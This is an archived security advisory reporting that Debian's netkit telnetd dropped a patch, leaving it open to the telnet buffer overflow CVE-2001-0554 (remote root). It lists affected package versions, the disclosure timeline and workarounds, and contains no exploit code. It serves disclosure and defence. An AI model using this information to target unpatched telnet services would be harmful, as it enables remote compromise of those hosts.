debian.telnetd.txt (PacketStormID:F34414)
2004-09-21 00:00:00
Michal Zalewski  
advisory,remote,root
linux,debian
CVE-2001-0554

The Netkit telnetd implementation shipped with Debian Linux appears to be lacking the AYT vulnerability patch. This exposes the platform to a remote root problem discovered by scut of TESO back in 2001.

Exposure:

  Remote root compromise through buffer handling flaws

Confirmed vulnerable:

  Up-to-date Debian 3.0 woody (issue is Debian-specific)
  Debian netkit-telnet-ssl-0.17.24+0.1 package
  Debian netkit-telnet-ssl-0.17.17+0.1 package

Mitigating factors:

  Telnet service must be running and accessible to the attacker.
  Nowadays, telnet service presence on newly deployed Linux hosts is
  relatively low. The service is still used for LAN access from other unix
  platforms, and to host various non-shell services (such as MUDs).

Problem description:

  Netkit telnetd implementation shipped with Debian Linux appears to be
  lacking the AYT vulnerability patch. This patch was devised by Red Hat
  (?) and incorporated into Debian packages, but later dropped.

  This exposes the platform to a remote root problem discovered by scut of
  TESO back in 2001 (CVE-2001-0554), as well as to other currently
  unpublished flaws associated with the old buffer handling code, and
  eliminated by the Red Hat's overhaul of buffer handling routines.

  Based on a review of package changelogs, my best guess is that the patch
  was accidentally dropped by Christoph Martin in December 2001, but I
  have not researched the matter any further.

Vendor response:

  I have contacted Debian security staff on August 29, and received a
  confirmation of the problem from Matt Zimmerman shortly thereafter.

  Since this is not a new flaw, I did not plan to release my own advisory,
  hoping they will release a DSA bulletin and fix the problem. Three weeks
  have passed, however, and Debian did not indicate any clear intent to
  release the information any time soon. They did release nine other
  advisories in the meantime, some of which were of lesser importance.

  As such, I believe it is a good idea to bring the problem to public
  attention, particularly since those running telnetd were and are,
  unbeknownst to them, vulnerable to existing exploits.

Workaround:

  Disable telnet service if not needed; manually apply Red Hat
  netkit patches, or compile the daemon from Red Hat sources.

  Note that netkit as such is no longer maintained by the author, and
  hence obtaining the most recent source tarball (0.17) is NOT
  sufficient. You may also examine other less popular telnetd
  implementations, but be advised that almost all are heavily based on the
  original code, and not always up-to-date with security fixes for that
  codebase.


PS. Express your outrage: http://eprovisia.coredump.cx.
    

- Vulnerability information

809
Multiple BSD Telnet telrcv Function Remote Command Execution
Remote / Network Access  Input Manipulation
Loss of Integrity

- Vulnerability description

A remote overflow exists in multiple BSD-based telnet daemons. The 'telrcv' function fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- Timeline

2001-07-18  2001-07-18
Unknown  Unknown

- Solution

Contact your vendor for an appropriate upgrade. An upgrade is required as there are no known workarounds.

